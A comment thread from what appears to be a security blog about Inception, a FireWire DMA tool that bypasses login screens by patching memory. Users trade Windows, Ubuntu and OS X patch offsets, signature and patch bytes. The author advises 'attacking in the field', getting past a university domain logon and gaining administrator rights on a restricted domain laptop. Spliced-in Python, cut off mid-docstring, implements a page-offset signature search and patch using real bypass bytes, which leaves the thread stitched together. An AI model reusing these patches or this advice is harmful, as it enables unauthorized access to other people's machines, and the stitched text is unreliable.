        Thanks for the info, but I decided not to redo my images in vmware or try and convert them right now.

        I have recently tried your ftwa.py version and it works great. But there is a problem I ran in too. I got a keyboardinput error with a patchoffset error when running it against a windows xp machine. I looked at your code and you didn’t have a ‘patchoffset’: 0×00′ in the settings.py under the windows xp settings. I changed that and the program worked fine. I only mention that if someone runs into the same error.

        I also deleted the 5 lines that dealt with offset 0x927 and added offset 0x9B6 instead under the other offsets. I recently upgraded an old Windows XP SP2 to SP3 and found a new offset as well. Here are my signatures for XP: offsets’: [0x0126, 0x8aa, 0x862, 0x946, 0x09B6]. I know XP is old but I’m trying to be thorough.

        I tried your program under Windows 7 x86 and everything works great, and the same can be said under Windows 7 x64 including SP1, but I didn’t have any antivirus running and it was a fresh install, but completely updated. If you can also add signature offset 0x80F for Vista that would be cool. I am currently working on Vista trying to find all signatures. Thanks again.

  10. Alex Cheng

    Hi, I’d just checked my laptops and they have a 4 pin female firewire port if I’m not wrong. So to connect from a laptop to another laptop one will need a 4 pin to 4 pin firewire cable?

    Thanks in advance.

  11. Alex Cheng

    One slight problem, I cannot log in to Active Directory after reboot. I’m not connected to the LAN, at home now. Not sure why. Have to get back to IT next Monday to see if it can be fixed =/

    • sbenting

      I ran across this, as well. For a domain account, it appears to leave something behind even after a reboot until you reconnect to the network and log in with the correct password again. Once it reauthenticates against the domain controller, all should work fine.

      Reply
      • Carsten

        I guess this is Windows cached credentials playing a trick on the AD authentication. I’ll have a look and see if it is possible to patch so that the erroneous password is not cached.

        Reply
      • SS

        Found something interesting here:
        https://astr0baby.wordpress.com/2011/09/20/unlocking-windows-7-sp1-locked-screen-remotely/
        “Remember that once the memory is patched and the user who locked the screen is part of a domain you need to immediately revert the patching by issuing the “screen_unlock -r” command after you log into Win7 with ANY password, or the domain account will be locked after a while.”
        I can confirm that the statement above is true, because after patching a Win7 x64 Enterprise laptop (part of domain) with Inception I was able to log in with a random password a few times to test, but after a while (perhaps a few hours) the domain account got locked.

        Reply
  12. tekkenhead

    Wanted to say thanks for the credit on the readme. Been pretty busy as of late to work on this right now. But wanted to say I love the new name!

    Reply
  13. Will

    Wow, great tool! I finally got an Ubuntu LiveUSB working on my Mac (the EFI makes it really hard), and I was able to try it out. The memory dump worked great! I was surprised at the amount of human-readable text in the first few megs of RAM from a dump of a Mac. Quite a few funny random things strewn about in there!

    However, I was unfortunately unable to use this software to actually extract a password or disable the unlock screen. Is there anything that I can do to help make a signature that works with OS X 10.7/10.8?

    Also, it would be great if the tool was capable of either writing to a custom file location or even Stdout. When using a LiveCD with no persistence, RAM dumps are very space-expensive, so being able to write to an external device or a FIFO or something can be useful.

    Reply
    • Carsten

      The signatures for OS X for unlocking are outdated, I’m working on “reversing” new ones (slowly, I don’t have much spare time after working 60-80 hrs / wk). If you’d like to help, this is where you could contribute. You could also fork my project on github, make improvements and issue a pull request for inclusion in Inception.

      Memory dumping and extraction of passwords should work though, I’ve tested that myself on Lion.

      Good suggestions regarding output file – I’ll implement that in the next minor version.

      Reply
  14. Skrotor

    Hi! Great tool.

    I tried the tool against Ubuntu 11.10 and got a successful result. However, when I try to unlock, the screen goes black and throws me back to the locked screen. Something obviously happened since I’m no longer getting “invalid password”, but I’m still not able to access the system.

    Ideas?

    Regards, Skrotor

    Reply
    • Carsten

      Hmm. Let me try that on my own machine, it may be that the tool finds a false positive and that I will need to expand the signatures to make them more accurate. Can you post the output of the following commands here?

      uname -a
      cat /etc/lsb-release

      Reply
      • Skrotor

        Sure can!

        luit@luit-HP-Compaq-nc8230-DX443AV:~$ uname -a
        Linux luit-HP-Compaq-nc8230-DX443AV 3.0.0-12-generic #20-Ubuntu SMP Fri Oct 7 14:50:42 UTC 2011 i686 i686 i386 GNU/Linux
        luit@luit-HP-Compaq-nc8230-DX443AV:~$ cat /etc/lsb-release
        DISTRIB_ID=Ubuntu
        DISTRIB_RELEASE=11.10
        DISTRIB_CODENAME=oneiric
        DISTRIB_DESCRIPTION="Ubuntu 11.10"

        Reply
          • Carsten

            I was unable to reproduce with the Ubuntu copy I had back home, but I’m doing a re-install to verify. If you want, you could try running the tool several times (if it finds several signatures, we know the culprit is a false positive)

          • Skrotor

            Ok, here is the output.

            First run:

            [*] Signature found at 0x3d7c6de0 (@page # 251846)
            [*] Data written: 0x0x31db
            [*] Data read: 0x0x31db
            [*] Write-back verified; patching successful

            The second run didn’t give any output after completing.

          • Carsten

            Aha – you’re using an old version of the tool – that offset is from the experimental signatures that were replaced some time ago. Do a git pull and try again.

            Let me know if that doesn’t solve your problems. A word of advice if you are attacking in the field: Ubuntu loads its kernel at high physical memory addresses. Depending on the physical memory size and layout of the target (if the machine has a dedicated graphics card, etc.) you may experience inability to read memory content over the 2/4 GiB mark. If the kernel is loaded above this mark, the unlock won’t work. Memory dumping will still work fine, though.

            Lycka till ;-)

          • Skrotor

            Strange, I hit the same signature even after a git pull. Thoughts?

            Tack :P

  15. Tom

    Hi,

    Tried your program at home and it worked perfectly. Then took it to uni to try out. However it says that it worked but when I try to log on to the PC, it says incorrect password.

    The target pc is running XP and the attacker is running latest ubuntu.

    Could it be because my account at uni is a network one?

    Cheers,

    Tom

    Reply
    • Carsten

      Correct. As your university PC probably authenticates against a central domain controller, the trick of allowing local blank passwords won’t work (you don’t have control over the DC password checking functionality). I’m currently considering migrating the Windows signatures to patch the local function that decides if accounts need to authenticate at all, which would probably fix domain logons as well. This is a future improvement, and not implemented at the moment.

      Depending on the state of the domain PC you are trying to hack, you may be able to log in locally (i.e., “Log into computer XXXX”) instead of logging into the domain. You could also try to disconnect the PC from the network before trying to log in.

      Also, depending on the legislation where you live, hacking your university’s property may be punishable by law. I would suggest testing this in a simulated environment rather than having a go at public computers, unless of course you have permission to do so.

      Reply
      • Tom

        Cheers for the reply,

        I’m trying to use it in a demo I have on wednesday, should be really good.

        No problem, I’ll give those things a try tomorrow and if it still doesn’t work I’ll take in my desktop haha

        Thanks again,

        Tom

        Reply
  16. tekkenhead

    I just ran your new version and I have to say WOW. It is a lot faster than the previous versions. Nice.

    Reply
  17. Goldfish

    Is there a download available for the Ubuntu live CD complete with this software?

    Reply
    • Carsten

      If you follow the instructions above, you’ll be able to install on an Ubuntu live CD.

      I have no plans to distribute .deb packages.

      Reply
      • goldfish

        Hi Carsten,
        I followed all instructions exactly. This is the setup:
        Ubuntu 11.04 i686
        python3 inception-0.13 libforensic1394-0.2
        no errors during build.

        ls /dev | grep fw results in fw0
        sudo modprobe -r ohci1394 sbp2 eth1394 dv1394 raw1394 video1394 removes the fw0 port.

        If I fire incept then I get the error “No firewire devices detected on the bus”.

        lsmod gives firewire_ohci as drivers, not the libforensic drivers.
        sudo modprobe -r ohci1394 sbp2 eth1394 dv1394 raw1394 video1394 removes the fw0 port. Incept places the same drivers back (firewire_uhci).
        What am I doing wrong?

        Reply
        • Carsten

          What type of system are you attacking? Is it connected when running inception? Have you tried attacking other systems?

          Reply
          • goldfish

            It is a Dell E4300, connecting to another laptop (Win7) does not make a difference. Is there a test mode to perform the steps that you do with Winlockpwn?

          • Carsten

            You must be connected to the other machine when running inception. The other machine’s FireWire device must work. Does a FireWire device pop up in device manager on the target?

            I don’t understand what you mean by ‘test mode’. You can use ‘-f’ to attack virtual machines, if that is what you’re aiming at.

        • Carsten

          I don’t understand why you are removing the FireWire modules. libforensic is a library, not a module. Suggest you reboot your system and try to run inception again – it will load the correct modules automatically.

          Reply
          • goldfish

            Ah, I understood libforensics were replacement drivers. My bad.
            I tested now with a XP SP3 box. After connecting the firewire and firing inception the configuration screen displays a new device “Unknown Vendor and Model IEEE1394 SBP2 device”.
            I also tested a Win7 box, this displayed “Linux Firewire Unknown Model”.

            Where did I do something wrong?

          • Carsten

            And did you try to reboot the host system as I suggested above? I understand that you attack from a live CD and that you’ll have to reinstall Inception, but as you seem to have loaded/unloaded quite a few FireWire modules that may be the source of the problem.

            Also, if you are using a FireWire expansion card on the host side, make sure you keep this plugged in while rebooting. Ubuntu’s support for hotplugging is not really stable.

          • goldfish

            The host was rebooted, Inception reinstalled. The E4300 has a built-in firewire port so this is not the problem.

          • Carsten

            Hmm. I’m unable to reproduce this error on any of my hardware. I’ve tested this on 3 different Lenovo computers and two Apple Macs, using both built-in and expansion ports. I’ve never heard of this problem before.

            I don’t have any LiveCDs to test from though, and that may be the issue. Suggest you try to attack from a permanent install, and/or another machine (or an expansion card). This may be a HW problem at your DELL.

            Failing both attacking from a permanent install and another machine, please open a ticket at github describing the problem with as much detail as possible (HW, chipsets, OS version, inception version, etc.).

          • goldfish

            I spent both last night and the whole day testing Inception without any luck. Tested on 3 laptops, both from live CD and HDD install, all give the same (wrong) result “No firewire devices detected on the bus”. Obviously I am doing something wrong, but what?
            The ticket you suggested is opened. Thanks so far.
            Paul

  18. james

    Wow, please tell me I’ve found a tool for my problem – I’ve forgotten my notebook (Win7 Bitlocker) administrator password and can only log in now as a normal user. Can’t boot from USB or CD to run offline tools, which won’t work anyway with Bitlocker.

    Will I be able to use inception to allow me to login as administrator with any password and then proceed to reset it or alternatively create another admin account to save the day?

    Reply
    • Carsten

      Yes – that should work (provided that I remember the bitlocker architecture correctly). I haven’t tested this, though.

      Just use ‘runas’ or ‘run as administrator’ to run the user management app after Inception is done patching.

      Reply
  19. Alex

    I used your tool to crack my OS. I have a question: can’t Intel’s VT-d protect against DMA attackers? Or, I am confused about why the IOMMU doesn’t defend against such an attacker.

    Reply
  20. Konrads

    On one Windows Vista machine, I get an error:
    The driver has detected a device with old or out-of-date firmware. The device will not be used.
    Source:sbp2port
    Event ID: 25
    EventData: \Device\Sbp2\Linux Firewire&UNKNOWN_MODEL&0&354fc000_0d4e3890_Instance00
    0F0000000100000000000000190004C0960300009C0000C000000000000000000000000000000000

    Reply
    • Carsten

      Interesting. You don’t write anything about what happens on the client side though, can you fill out a detailed issue on github?

      Reply
      • Konrads

        Just added an issue on github re Windows Vista. Let me know if you need more information.

        Reply
  21. Zeliz

    Could you let this tool modify the kernel? lib-pam is in userspace, so PAM based authentication is overwritten in userspace.

    Reply
  22. Zeliz

    I want to dump the memory of a specific address region. My address is like 0xeb5f5499, so in your dump mode I typed incept -d 0xeb5f5499. Am I using it the right way? Because I don’t see what I want. Thanks

    Reply
    • Carsten

      No, that’s not the right way. Use incept -h to get a description on how to use the dump mode. And remember that physical memory address != virtual memory address.

      Reply
      • Zeliz

        Thanks! For now I want to use this tool to modify an address, which I have already found in the dump file. So how can I change the settings or other files to make this work? I just need to modify this place, no matter what kind; just change the location of the signature to my place? In `settings`? Thanks!

        Reply
        • Carsten

          I’ll add a mode where you can specify signature, patch and offset from the command line. Stand by for a new release in a week or so. If you are in a hurry you can modify settings.py.

          Reply
  23. Berklin

    I am not clear about the signature locations, because for ubuntu is:
    Offsets: 0xebd, 0xbaf, 0xa7f
    Signature: 0x83f81f89c774
    Patch: 0xbf00000000eb
    But when I got the result from attacking, it shows:
    Searching, 3368 MiB so far. Sample data read: 0x894424108d44
    Signature found at 0xd281dbaf (@page # 862237)
    Data written: 0x0xbf00000000eb
    Data read: 0x0xbf00000000eb

    The `Sample data read` didn’t match the Signature, and the Patch also didn’t match the `Data written`. Why?
    Thanks

    Reply
    • Carsten

      The sample data read doesn’t match the signature because the tool only outputs data read every 128 pages or so (that’s why it’s called a ‘sample’).

      The patch does match the data written in your example above, so I guess I’m not sure I know what you’re asking?

      Reply
    • Carsten

      BackTrack doesn’t load FireWire drivers when you hotplug a device into the machine.

      Issue the following command:

      modprobe firewire-ohci firewire-sbp2

      in the terminal on your BT machine to load the drivers on the victim side into the kernel. Because of this, BT is also not vulnerable to the attack by default. Good on the people that configured BT – secure defaults is a good thing.

      If you still are having trouble, verify that the cable and interfaces actually work by connecting a real FW device (such as a hard drive) to both the victim and the host, using the same cable.

      Reply
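      The comment above makes a defensive point worth checking on any Linux machine: a kernel with only the OHCI controller driver loaded will not act on an SBP-2 unit directory, and only `firewire-sbp2` (or `sbp2` in the older stack the thread also mentions) turns a hotplugged device into one that is granted DMA. The snippet below is an added example, not code from the Inception project; it parses the text format of `lsmod` and classifies the host’s exposure. The first sample is the `lsmod | grep fire` output quoted later in this thread, the second is a constructed variant of the same host after `modprobe firewire-ohci firewire-sbp2`.

```python
"""Classify a Linux host's FireWire/SBP-2 exposure from lsmod output.

Added example (not part of Inception). It parses lsmod's text columns
(Module, Size, Used, by) and reports whether an SBP-2 driver is loaded.
"""

# lsmod output as quoted in this thread: controller driver loaded,
# but no SBP-2 driver, so this kernel does not yet accept SBP-2 devices.
LSMOD_OHCI_ONLY = """\
Module                  Size  Used by
firewire_ohci          40172  0
firewire_core          56906  1 firewire_ohci
crc_itu_t              12627  1 firewire_core
"""

# Constructed variant: the same host after `modprobe firewire-ohci firewire-sbp2`.
LSMOD_WITH_SBP2 = """\
Module                  Size  Used by
firewire_sbp2          21354  0
firewire_ohci          40172  0
firewire_core          56906  2 firewire_sbp2,firewire_ohci
crc_itu_t              12627  1 firewire_core
"""

# Module names from both Linux FireWire stacks named in the thread.
SBP2_MODULES = {"firewire_sbp2", "sbp2"}          # grant DMA to SBP-2 devices
CONTROLLER_MODULES = {"firewire_ohci", "ohci1394"}  # controller driver only


def parse_lsmod(text):
    """Return {module: (size, use_count, [users])} from lsmod's text output."""
    modules = {}
    for line in text.splitlines():
        fields = line.split()
        if not fields or fields[0] == "Module":
            continue  # skip blank lines and the header
        name, size, used = fields[0], int(fields[1]), int(fields[2])
        # The "Used by" column is a comma-separated list, absent when empty.
        users = fields[3].rstrip(",").split(",") if len(fields) > 3 else []
        modules[name] = (size, used, users)
    return modules


def firewire_exposure(text):
    """'sbp2_loaded' if an SBP-2 driver is present, 'controller_only' if just
    the OHCI driver is loaded, 'no_firewire' otherwise."""
    loaded = set(parse_lsmod(text))
    if loaded & SBP2_MODULES:
        return "sbp2_loaded"
    if loaded & CONTROLLER_MODULES:
        return "controller_only"
    return "no_firewire"


if __name__ == "__main__":
    for label, sample in (("as quoted", LSMOD_OHCI_ONLY), ("after modprobe", LSMOD_WITH_SBP2)):
        print(f"{label}: {firewire_exposure(sample)}")
```

One caveat for anyone using this as a check: on distributions that autoload modules on hotplug, the absence of `firewire_sbp2` in `lsmod` at rest says nothing about what the kernel will load when a device appears, which is exactly the difference between BackTrack and a stock desktop install that the comment describes. A blacklist entry for the SBP-2 module, or the BIOS and expansion-port measures discussed elsewhere in this thread, is what actually prevents the load.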
  24. etudiant404

    Hi

    I am studying the DMA issue. Inception is a very good tool, thanks a lot for this. I noticed it is also possible to do a DMA attack with an old iPod. I have one but I don’t manage to use it in the correct way…
    Any clues, please?

    Thanks in advance!

    Reply
    • Carsten

      I’ve experimented with the iPod option itself, the problem is that the iPodLinux (http://en.wikipedia.org/wiki/IPodLinux / http://ipodlinuxinstl.sourceforge.net/) project is not that active anymore, it relies on the old linux firewire stack, and that 1-3G iPods with firewire are not easy to come by. The best I can do is to urge you to read the documentation on the iPodLinux site.

      Inception will not work on an iPod as it uses the new Linux JuJu FireWire stack (introduced in the 2.6.31 Linux kernel). You would have to use winlockpwn.

      Reply
      • etudiant404

        Ok

        Sorry for this late answer and thanks for your quick answer. I will check out winlockpwn. And if it doesn’t work because the program is too old, I will use a laptop as a demo tool. The main point for me is to have a support to do some attack examples for potential customers, and doing this from an iPod is more impressive and furtive than from another computer.

        However, thanks again!

        Reply
  25. Nickless

    Hi Carsten,

    great tool. I tested it a couple of times against a 12.04 victim and it worked well.
    But after a week or so it doesn’t work anymore! Nothing changed, same victim, same attacker, same cable. Tried different cables. Also booted the victim machine in Windows.
    Also installed Backtrack 5R3 on attacker machine.
    I now always get the message:
    [!] FireWire modules do not seem to be loaded. Load them? [Y/n]: y
    [!] Could not initialize FireWire. Are the modules loaded into the kernel?
    [!] Attack unsuccessful

    lsmod | grep fire shows:
    firewire_ohci 40172 0
    firewire_core 56906 1 firewire_ohci
    crc_itu_t 12627 1 firewire_core

    If I unplug the cable and put it back in I get:
    [!] No FireWire devices detected on the bus
    [!] Attack unsuccessful

    Any idea what could be happening here?

    Reply
    • Carsten

      Not really easy to say what this could be, I’ve never experienced this myself. I haven’t tested Inception with BT5R3 yet, so have that in mind.

      This sounds like an error on the host side of the connection. Have you tried to recompile and reinstall the libforensic1394 libraries? I would also have a look at what the command dmesg outputs before and after you plug/unplug the cable.

      I would also test that the FireWire interfaces on both sides (host and victim) still work. Good luck!

      Reply
  26. sgh

    Awesome tool. Has anyone got this working over a Thunderbolt cable yet? I’m connecting a Mac Mini with BT5 to a retina MBP and pickpocket isn’t detecting the latter.

    Reply
      • Carsten

        It works over Thunderbolt, kinda. You have to use a FireWire to Thunderbolt converter (available at the Apple store), as Thunderbolt to Thunderbolt won’t work (the tool is using FireWire DMA to gain access as of now).

        Reply
        • sgh

          Interesting. I got the adapter, but still no success. Even more strange, rebooting with only FW plugged in (adapter-less) now yields “No FireWire devices detected on the bus/Attach unsuccessful” even though lspci detects the controller.

          Reply
          • Carsten

            Do other modes than pickpocket work?

            Unfortunately, I’m unable to assist you with hardware issues as it is hard for me to debug remotely. If you find a bug, please submit to github after making absolutely sure it’s not a hardware issue.

  27. void

    Hi,
    I’ve been unsuccessful in attacking Win7 x64 Enterprise from BT5r3.
    Steps taken:
    Check BIOS on both machines to see if IEEE1394 port is enabled.
    Connected both laptops (HDD LED on victim machine goes flashing for a while, so it’s being recognised/installed it seems; also the ‘Device Manager’ screen refreshed itself a couple of times).
    Output on BT:
    root@bt:~/Desktop/carmaa-inception-5e0426e# ./bt5-setup.sh

    [+] Setting up the environment
    [-] ‘firewire-ohci’ mod already loaded – skipping
    [-] Directory ‘/pentest/forensics/IR’ already exists – skipping
    [+] Downloading & installing required files
    [-] ‘cmake’ already installed – skipping
    [-] ‘python3’ already installed – skipping
    [-] ‘libforensic1394-0.2.tar.gz’ already downloaded – skipping
    [+] Building ‘libforensic1394-0.2′ …
    [-] Directory ‘inception’ already exists – skipping
    [+] Launching inception

    _| _| _| _|_|_| _|_|_|_| _|_|_| _|_|_| _| _|_| _| _|
    _| _|_| _| _| _| _| _| _| _| _| _| _|_| _|
    _| _| _| _| _| _|_|_| _|_|_| _| _| _| _| _| _| _|
    _| _| _|_| _| _| _| _| _| _| _| _| _|_|
    _| _| _| _|_|_| _|_|_|_| _| _| _| _|_| _| _|

    v.0.1.4 (C) Carsten Maartmann-Moe 2012
    Download: http://breaknenter.org/projects/inception | Twitter: @breaknenter

    [!] No FireWire devices detected on the bus
    [!] Attack unsuccessful

    [ 172.611925] firewire_ohci 0000:86:09.0: PCI INT A -> GSI 20 (level, low) -> IRQ 20
    [ 172.611931] firewire_ohci 0000:86:09.0: setting latency timer to 64
    [ 172.676377] firewire_ohci: Added fw-ohci device 0000:86:09.0, OHCI v1.10, 4 IR + 4 IT contexts, quirks 0x11
    [ 173.176134] firewire_core: created device fw0: GUID 5566778811223344, S400
    [ 174.808267] firewire_core: refreshed device fw0
    [ 177.028532] firewire_core: refreshed device fw0

    root@bt:~/Desktop/carmaa-inception-5e0426e# lsmod |grep fire
    firewire_ohci 39964 0
    firewire_core 61165 1 firewire_ohci
    crc_itu_t 12579 1 firewire_core

    I’ve seen your comment that you didn’t test with BT5r3 yet, but perhaps I can help you assist in troubleshooting, let me know if you need more info/output.
    Thanks!

    Reply
    • Carsten

      I just tested inception from BT5R3 against two different machines running fully updated Win7 x64, both succeeded. This is likely a hardware problem, especially since you cannot see any other devices on the FW bus.

      What kind of FW cable are you using (4/6/9 pin)? Are you using an express card on the BT5 side?

      Reply
      • void

        That’s odd, must be a hardware thing then.
        I’m using the 4 pins on both sides, I don’t know if that’s a problem?
        I heard someone say FireWire has a cross cable thing like Ethernet has, but I couldn’t find much about it.
        Just to be sure I don’t do anything wrong, could you do a step by step rundown of how you successfully attacked?
        The problem with testing is that I don’t have any other FireWire hardware, especially with a 4 pin connector, available :/
        Thanks for your time!

        Reply
        • Carsten

          There’s nothing really much of a process for attacking:

          1. Attach host and victim
          2. Run the tool

          Unfortunately, I’m unable to assist you with hardware issues as it is hard for me to debug remotely. If you find a bug, please submit to github after making absolutely sure it’s not a hardware issue. That includes testing your hardware with a FireWire device.

          Reply
  28. Fu

    Hi Carsten
    It’s a great tool. I tried your tool on a Windows 7 32-bit machine and it worked great.
    But when I tried it on a Windows 7 64-bit machine it didn’t work. I checked the signature for my operating system and updated the tool. The program says that it found the signature and patched, but I can’t log in to the system. I dumped the memory and saw that the tool really wrote the memory. I couldn’t solve the problem. Do you have any idea?

    Reply
      • Fu

        msv1_0.dll version 6.1.7600.16385,
        Windows 7 Ultimate 64 bit,
        signatures 0x291, 0x2a8, 0x321, 0x2a2, 0x2a1, 0x6a2

        Reply
        • Carsten

          Thanks, will look into it. This sounds like a false positive, have you tried to run the tool twice in a row (i.e., let the tool patch twice)?

          Reply
          • Fu

            I ran the tool almost thirteen times and finally it worked. It took a really long time.
            Do you have any idea about how this problem could be fixed?

          • Carsten

            You’ve got to give me a more detailed description than that. Please describe, in detail, the events that led to success. Did it patch every time? Did it get DMA? etc.

          • Fu

            Unfortunately it didn’t patch every time. Did it get DMA?? I didn’t understand what you mean. If it doesn’t get DMA, it will never work. Am I wrong?

          • Carsten

            Use the -v switch to see if you’re getting data (you should see sample bytes being displayed). You may not be getting DMA every time. Also, see the question above: How much RAM does your target have?

          • Carsten

            See the troubleshooting/caveat section above. The signature may be situated above 2 GB, which you may not be able to read.

  29. Fu

    Could the signatures be variable or something else? My trial on Windows 7 64 bit was a little odd. I know the exact signature and offset. The tool sometimes works. But sometimes, although it searched through all the memory, the tool couldn’t find any signature. I ran it more than once in a row but it didn’t give me a stable solution. I tried it on two different Windows 7 64 bit systems (with different offsets). Am I doing something wrong? Could you suggest a solution for that?

    Reply
  30. Thilaknath

    Hi Carsten, I found this tool pretty interesting, and the way in which it penetrates the opponent’s system. Can you please help me out by providing some study materials on how exactly Inception manages to read the victim’s RAM and overwrite it with the code.

    Thank you

    Reply
  31. Igor

    I tried your script against Windows 7 x86 with 2 GB RAM and Windows 7 x64 with 4 GB RAM and I was successful. On the x64 machine, although, the system was not usable after logging in; every app crashed.

    Then I tried a Mac Mini with Mac OS 10.7.2 and 4 GB RAM and a MacBook Pro with Mac OS 10.7.2, with no luck. The script writes that the DMA shield is down, reads the whole 4 GB of memory, but with no success. Any idea where the problem may be?

    Reply
    • Carsten

      What servicepack? On what offset is the tool patching? Read the article above and post an issue on github.

      For the macs, use -v to see if you actually have DMA. Again, read the troubleshooting section above.

      Reply
  32. AJ

    Hello! Great tool! Ran into a problem though!

    I got it to work. Was all happy about it. Then I turned off both my machines. Now having them powered up again and trying to do the same it does not work.

    As my Linux (Ubuntu 12.02 LTS) machine sees its firewire and having the drivers on my win 7 64-bit machine, same as yesterday, when I type incept it keeps telling me that there is no device detected. Also tried it on a second win vista pc but the same message. I have read all the above, FAQ and all but have not managed to get it working for a second time.

    Any relevant tips or suggestions are welcome!

    Reply
  33. J3ster

    Curious if others have experience to share with regards to the two points below.

    - Does the DLL patching work when the victim machine has been hardened with renamed local admin accounts?

    - What about local Windows versions in different languages than English?

    Great tool.

    Reply
    • Carsten

      The tool patches the authentication mechanism itself, what accounts you have on the system doesn’t matter, all accounts will be unlocked.

      Have only tried a Norwegian version of XP and that worked, language shouldn’t matter. If you find that it does, please submit a bug on github.

      Reply
  34. Jesse

    I was wondering if Inception will be changed to look over 4 GB of RAM, as it gets more common to have more RAM these days!?

    Nice tool btw. I’ve learned a lot lately.. all for educational purposes! I am enjoying the knowledge!

    Reply
    • Carsten

      The 4 GiB limit is not imposed by Inception, but by the fact that FireWire uses 32-bit addressing. There’s no way of getting around that limit using FireWire, unfortunately.

      Reply
  35. Will

    Hello, I’m pretty new at this, and I’m getting the cable tomorrow, but I was wondering if I would be able to use this with a firewire and adapter to thunderbolt, from my macbook pro mid 2012 to a macbook air mid 2012 (only has thunderbolt). Once I connect the 2, I should be able to use this tool? Any help would be great, thank you in advance!

    Reply
  36. samet

    Hi,

    I’ve tried it between Windows 7 x64 SP1 (HP Elitebook 8460p, 8 GB RAM) and Backtrack 5r3. However, it does not work. I checked the offset information with IDA and it’s correct. After searching memory (4096 MB), the program says “attack unsuccessful” and then Windows 7 freezes. It does not respond to anything (even the mouse does not work). What may the problem be?

    Regards,

    Reply
    • Carsten

      See the troubleshooting section above.

      The DLLs that Inception patches in-memory may be located above 4 GiB in RAM, which is not accessible to FireWire. This is a known issue with x64 Windows 7 and up machines.

      If you want to test you could remove one of the memory modules and re-test with only 4 GiB of RAM.

      Reply
      • Jeroen

        Typically it stops with the error message somewhere in between 60 – 80%. Same Setup works fine on other target systems.

        Reply
  37. newf

    Hi
    I am trying your tool in BackTrack 5. I followed the instructions above and none gave an error. Then when I ran the tool it gave this error:

    ImportError: No module named forensic1394.bus

    I copied the libforensic1394 files into the /usr/lib folder but it didn’t solve my problem.
    Do you have any idea about this error?

    Reply
    • Carsten

      Removed a small typo in the install instructions (‘../’). Make sure you’ve installed the python3 bindings for the libforensic1394 library by going to the libforensic1394-0.2/python source directory and executing ‘sudo python3 setup.py install’.

      Reply
  38. Thilaknath

    Hi, I have tried to use Inception on the following configuration listed below

    FireWire (4 pin cable)
    Target OS: Windows 7 with 4 GB RAM,
    Host OS: Backtrack 5 r3,
    I have installed the libforensic library and the Python 3 binding, but still, after numerous efforts, it displays the logo of Inception and prints
    ATTACK UNSUCESSFULL, no firewire device found, but the cable seems to work fine.
    I think the problem is that the BackTrack OS is not able to detect the FireWire port. Can you please help me out?

    Reply
    • Carsten

      The tool works perfectly from BackTrack, that’s the OS I’m using all the time. Check your hardware, BIOS settings and cable.

      Reply
  39. funguy

    Congratulations. Works perfectly on a MacBook Pro 7 running Ubuntu 12.10 LTS (8 GB RAM, 64 bit).
    It reset the password of the screensaver on my home machine to anything.
    (also running Ubuntu 12.10 LTS, 3 GB RAM, 32 bit)
    Great work. (not ironic)

    I strongly suggest you now help the community to fix this huge problem.
    Countermeasure ideas or suggestions would be a good help.

    Reply
    • Carsten

      See linked resources above for countermeasures. I guess I disagree about the “hugeness” of the problem, but I agree that it is a problem that needs to be fixed.

      Reply
  40. r

    Hi

    How does Inception patch memory? Isn’t there some page protection enforcement?
    As far as I know, even if you use DMA you can’t bypass the page protection mechanism :/

    Maybe you could explain the magic which is done behind the scenes? (or refer to the code)?

    Reply
  41. Cote

    So the only way to protect against this is to disable FireWire in the bios for Desktop PCs? For a laptop, just disable PCMCIA/ExpressCards SDIO and Thunderbolt?

    Reply
  42. Kurious

    Attack on Window 7 Enterprise 64bit machine with bitlocker appears to be successful. Firewire detected, attack reported as successful. However, no elevated rights, and can’t seem to log on with any password to obtain administrator rights. Only two local logon accounts available, with the Administrator account disabled. Only logon I have available is my domain logon with restricted rights. Any suggestions on how to gain administrator rights?

    Reply
        • Carsten

          Maybe you could try to open a command shell as Administrator after running the tool (Right click cmd.exe -> Run as administrator)? You may have to disconnect from the network (e.g., the AD domain) to force a local check of the cached password as opposed to a full AD check.

          Reply
  43. Fabi

    Quick question from a newbie: Would it also be possible to search for a file path in RAM and replace it with another file path? If yes, how would that work and could I do it using your -m switch?

    Reply
    • Carsten

      You can search for anything that is loaded in memory. File paths may be loaded at different offsets within pages between re-boots, so you may have trouble locating them reliably without doing a sequential search, which will likely yield a lot of false positives. If the file path is hardcoded in a binary, it will be loaded at the same offset within a memory page each time, which will make it easier to locate it. That’s the way Inception works – it searches for signatures at pre-determined offsets within the memory pages.

      Take a look at inception/cfg.py for more on the way the signatures are structured.

      Reply
  44. Fabi

    OK, I see. How would that work? I mean, would it be difficult for me to modify Inception in order to do that?

    Reply
  45. skies

    Hi,
    I've noticed that Inception freezes/bluescreens the Windows target if shared memory for the graphics card is used, as soon as Inception touches the shared memory areas.
    Of course, that is not an Inception problem and probably cannot be fixed, so I just wanted to let you know, ask for confirmation, and suggest that a note could be taken for others wondering why the target freezes.

    Reply
  47. Erik Westrup

    How do you, in Linux, find where pam_authenticate() is usually placed in real memory? I've been trying to pass a memory dump from fmem to strings etc. Running "nm -D /lib/i386-linux-gnu/libpam.so.0 | grep authenticate" gives the internal lib offset, I believe.

    Reply
    • Carsten

      You won't be able to predict where it is placed in memory, but you can predict where within a single memory page certain parts of the code are loaded. To generate signatures for Inception you'll have to reverse engineer the binary of the function you want to locate (e.g. the binary containing pam_authenticate()) and find the offset of the code you want to change.

      Reply
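Carsten's two replies above (on why a hard-coded string sits at the same in-page offset across reboots, and on deriving a signature for a function such as pam_authenticate()) describe the mechanism in words. The following Python is an added illustration of that page-offset search and patch, not Inception's own code. The signature and patch bytes are copied from the "Mac OS X" target listing that appears elsewhere on this page; the memory image, the target name, the unreadable page and the helper names (in_page_offset, find_signatures, patch_page, make_demo_memory, demo) are constructed for this example.

```python
PAGESIZE = 0x1000  # 4 KiB pages, the granularity at which the OS maps code


def in_page_offset(virtual_address):
    """Offset of a code location inside its 4 KiB page. Compute it from the
    address the disassembler shows (image base + RVA), not from the raw file
    offset: sections are mapped at page granularity, so only the low 12 bits
    of the virtual address survive into physical memory. (Assumes 4 KiB pages.)"""
    return virtual_address & (PAGESIZE - 1)


# Target description in the same shape "incept -v" prints: signature bytes
# expected at a fixed in-page offset, and the patch written over them.
# Signature/patch bytes come from the Mac OS X target listing on this page;
# the name is a label for this example, not Inception's.
DEMO_TARGET = {
    "name": "demo: Mac OS X signature at 0x7cf",
    "offset": 0x7cf,
    "signature": bytes.fromhex("41bff6c8ffff48c78588"),
    "patch": bytes.fromhex("41bf0000000048c78588"),
    "patch_offset": 0x0,
}


def find_signatures(read_page, num_pages, targets, start_page=0):
    """Scan pages [start_page, num_pages) and test every target at its fixed
    in-page offset only, which is what keeps the search cheap and the false
    positive rate low. read_page(n) returns PAGESIZE bytes or raises OSError
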